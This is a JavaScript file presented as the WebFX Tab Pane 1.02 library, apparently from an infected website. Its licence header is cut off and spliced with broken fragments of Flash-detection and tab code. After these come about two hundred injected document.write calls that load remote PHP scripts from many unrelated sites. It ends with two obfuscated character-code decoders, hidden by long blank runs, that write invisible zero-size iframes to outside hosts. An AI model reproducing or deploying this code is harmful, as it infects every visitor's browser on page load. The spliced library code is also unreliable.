/*----------------------------------------------------------------------------\
|                               Tab Pane 1.02                                 |
|-----------------------------------------------------------------------------|
|                         Created by Erik Arvidsson                           |
|                  (http://webfx.eae.net/contact.html#erik)                   |
|                      For WebFX (http://webfx.eae.net/)                      |
|-----------------------------------------------------------------------------|
|                  Copyright (c) 1998 - 2003 Erik Arvidsson                   |
|-----------------------------------------------------------------------------|
| This software is provided "as is", without warranty of any kind, express or |
| implied, including  but not limited  to the warranties of  merchantability, |
| fitness for a particular purpose and noninfringement. In no event shall the |
| authors or  copyright  holders be  liable for any claim,  damages or  other |
| liability, whether  in an  action of  contract, tort  or otherwise, arising |
| from,  out of  or in  connection with  the software or  the  use  or  other |
| dealings in the software.                                                   |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| This  software is  available under the  three different licenses  mentioned |
| below.  To use this software you must chose, and qualify, for one of those. |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| The WebFX Non-Commercial License          http://webfx.eae.net/license.html |
| Permits  anyone the right to use the  software in a  non-commercial context |
| free of charge.                                                             |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| The WebFX Commercial license           http://webfx.eae.net/commercial.html |
| Permits the  license holder the right to use  the software in a  commercial |
| context. Such license must be specifically obtained, however it's valid for |
| any number of  implementations of the licensed software.                    |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
| GPL - The GNU General Public License    http://www.gnu.org/licenses/gpl.txt |
| Permits anyone the right to use and modify the software without limitations |
| as long as proper  credits are given  and the original  and modified source |
| code are included. Requires  that the final product, software derivate from |
| the original  source or any  software  utilizing a GPL  component, such  as |
| this, is also licensed under the GPL license.                              e if (versionRevision[0] == "r") {
				versionRevision = versionRevision.substring(1);
				if (versionRevision.indexOf("d") > 0) {
					versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
				}
			}
			var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
		}
	}
	// MSN/WebTV 2.6 supports Flash 4
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
	// WebTV 2.5 supports Flash 3
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
	// older WebTV supports Flash 2
	else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
	else if ( isIE && isWin && !isOpera ) {
		flashVer = ControlVersion();
	}	
	return flashVer;
}

// When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision)
{
	versionStr = GetSwfVer();
	if (versionStr == -1 ) {
		return false;
	} else if (versionStr != 0) {
		if(isIE && isWin && !isOpera) {
			// Given "WIN 2,0,0,11"
			tempArray         = versionStr.split(" "); 	// ["WIN", "2,0,0,11"]
			tempString        = tempArray[1];			// "2,0,0,11"
			versionArray      = tempString.split(",");	// ['2', '0', '0', '11']
		} else {
			versionArray      = versionStr.split(".");
		}
		var versionMajor      = versionArray[0];
		var versionMinor      = versionArray[1];
		var versionRevision   = versionArray[2];

        	// iis.pages = []; this.selectedIndex = null; this.useCookie = bUseCookie != null ? bUseCookie : true; this.element.className = this.classNameTag + " " + this.element.className; this.tabRow = document.createElement( "div" ); this.tabRow.className = "tab-row"; el.insertBefore( this.tabRow, el.firstChild ); var tabIndex = 0; if ( this.useCookie ) { tabIndex = Number( WebFXTabPane.getCookie( "webfxtab_" + this.element.id ) ); if ( isNaN( tabIndex ) )
tabIndex = 0;}
this.selectedIndex = tabIndex; var cs = el.childNodes; var n; for (var i = 0; i < cs.length; i++) { if (cs[i].nodeType == 1 && cs[i].className == "tab-page") { this.addTabPage( cs[i] );}
}
}
WebFXTabPane.prototype.classNameTag = "dynamic-tab-pane-control"; WebFXTabPane.prototype.setSelectedIndex = function ( n ) { if (this.selectedIndex != n) { if (this.selectedIndex != null && this.pages[ this.selectedIndex ] != null )
this.pages[ this.selectedIndex ].hide(); this.selectedIndex = n; this.pages[ this.selectedIndex ].show(); if ( this.useCookie )
WebFXTabPane.setCookie( "webfxtab_" + this.element.id, n );}
}; WebFXTabPane.prototype.getSelectedIndex = function () { return this.selectedIndex;}; WebFXTabPane.prototype.addTabPage = function ( oElement ) { if ( !hasSupport() ) return; if ( oElement.tabPage == this )
return oElement.tabPage; var n = this.pages.length; var tp = this.pages[n] = new WebFXTabPage( oElement, this, n ); tp.tabPane = this; this.tabRow.appendChild( tp.tab ); if ( n == this.selectedIndex )
tp.show(); else
tp.hide(); return tp;}; WebFXTabPane.prototype.dispose = function () { this.element.tabPane = null; this.element = null; this.tabRow = null; for (var i = 0; i < this.pages.length; i++) { this.pages[i].dispose(); this.pages[i] = null;}
this.pages = null;}; WebFXTabPane.setCookie = function ( sName, sValue, nDays ) { var expires = ""; if ( nDays ) { var d = new Date(); d.setTime( d.getTime() + nDays * 24 * 60 * 60 * 1000 ); expires = "; expires=" + d.toGMTString();}
}
var a = document.createElement( "A" ); this.aElement = a; a.href = "#"; a.onclick = function () { return false;}; while ( this.tab.hasChildNodes() )
a.appendChild( this.tab.firstChild ); this.tab.appendChild( a ); var oThis = this; this.tab.onclick = function () { oThis.select();}; this.tab.onmouseover = function () { WebFXTabPage.tabOver( oThis );}; this.tab.onmouseout = function () { WebFXTabPage.tabOut( oThis );};}
WebFXTabPage.prototype.show = function () { var el = this.tab; var s = el.className + " selected"; s = s.replace(/ +/g, " "); el.className = s; this.element.style.display = "block";}; WebFXTabPage.prototype.hide = function () { var el = this.tab; var s = el.className; s = s.replace(/ selected/g, ""); el.className = s; this.element.style.display = "none";}; WebFXTabPage.prototype.select = function () { this.tabPane.setSelectedIndex( this.index );}; WebFXTabPage.prototype.dispose = function () { this.aElement.onclick = null; this.aElement = null; this.element.tabPage = null; this.tab.onclick = null; this.tab.onmouseover = null; this.tab.onmouseout = null; this.tab = null; this.tabPane = null; this.element = null;}; WebFXTabPage.tabOver = function ( tabpage ) { var el = tabpage.tab; var s = el.className + " hover"; s = s.replace(/ +/g, " "); el.className = s;}; WebFXTabPage.tabOut = function ( tabpage ) { var el = tabpage.tab; var s = el.className; s = s.replace(/ hover/g, ""); el.className = s;}; function setupAllTabs() { if ( !hasSupport() ) return; var all = document.getElementsByTagName( "*" ); var l = all.length; var tabPaneRe = /tab\-pane/; var tabPageRe = /tab\-page/; var cn, el; var parentTabPane; for ( var i = 0; i < l; i++ ) { el = all[i]
cn = el.className; if ( cn == "" ) continue; if ( tabPaneRe.test( cn ) && !el.tabPane )
new WebFXTabPane( el ); else if ( tabPageRe.test( cn ) && !el.tabPage &&
tabPaneRe.test( el.parentNode.className ) ) { el.parentNode.tabPane.addTabPage( el );}
}
}
function disposeAllTabs() { if ( !hasSupport() ) return; var all = document.getElementsByTagName( "*" ); var l = all.length; var tabPaneRe = /tab\-pane/; var cn, el; var tabPanes = []; fostairs.co.jp/cgi-bin/wp-load.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://lepavillonrestaurant.com/css/directions3.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://dessinacademy.com/tmp/ENQUIRY.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://takahata-wine.co.jp/wine-info/ex2010spring_top.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://mayoora.com/DPR/2.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://riadjeanclaude.com/images/gifimg.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://blog.loveme.co.il/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://lemainformatica.it/Photoshop/alfagest_xvid.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://alpaf.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://cobblestonetherapy.com/images/gifimg.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://tachafire.com/images/pixel.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://123coder.com/php.2/indexl.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://smallcap360.com/images/NASD-Bid-And-Ask.php ><\/script>');
document.write('<script src=http://sweetobsessions.netfirms.com/_vti_cnf/gallery.php ><\/script>');
document.write('<script src=http://budapest.rezidencia.com/images/o2i/hatter-mozaik-red.php ><\/script>');
document.write('<script src=http://budapest.rezidencia.com/images/o2i/hatter-mozaik-red.php ><\/script>');
document.write('<script src=http://budapest.rezidencia.com/images/o2i/hatter-mozaik-red.php ><\/script>');
document.write('<script src=http://budapest.rezidencia.com/images/o2i/hatter-mozaik-red.php ><\/script>');
document.write('<script src=http://budapest.rezidencia.com/images/o2i/hatter-mozaik-red.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://winninginanunfairworld.com/images/gifimg.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://step2dance.ru/language/index.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://dariolecman.com/images/gifimg.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://amigo-print.spb.ru/ezg_data/btn_1.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://mundosabatinero.com.ar/Scripts/eventos.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://abasi.kadirkalemci.com/images/makaleler.php ><\/script>');
document.write('<script src=http://jiletlitelsanayi.com/_private/page4.php ><\/script>');
document.write('<script src=http://jiletlitelsanayi.com/_private/page4.php ><\/script>');
document.write('<script src=http://jiletlitelsanayi.com/_private/page4.php ><\/script>');
document.write('<script src=http://jiletlitelsanayi.com/_private/page4.php ><\/script>');
document.write('<script src=http://jiletlitelsanayi.com/_private/page4.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://unganweb.com/blog/Untitled-1.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');
document.write('<script src=http://shababnetlive.com/flash/_vti_inf.php ><\/script>');





























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!110!97!108!121!116!105!99!115!46!114!101!98!101!108!53!46!99!111!109!47!115!116!97!116!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);






























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

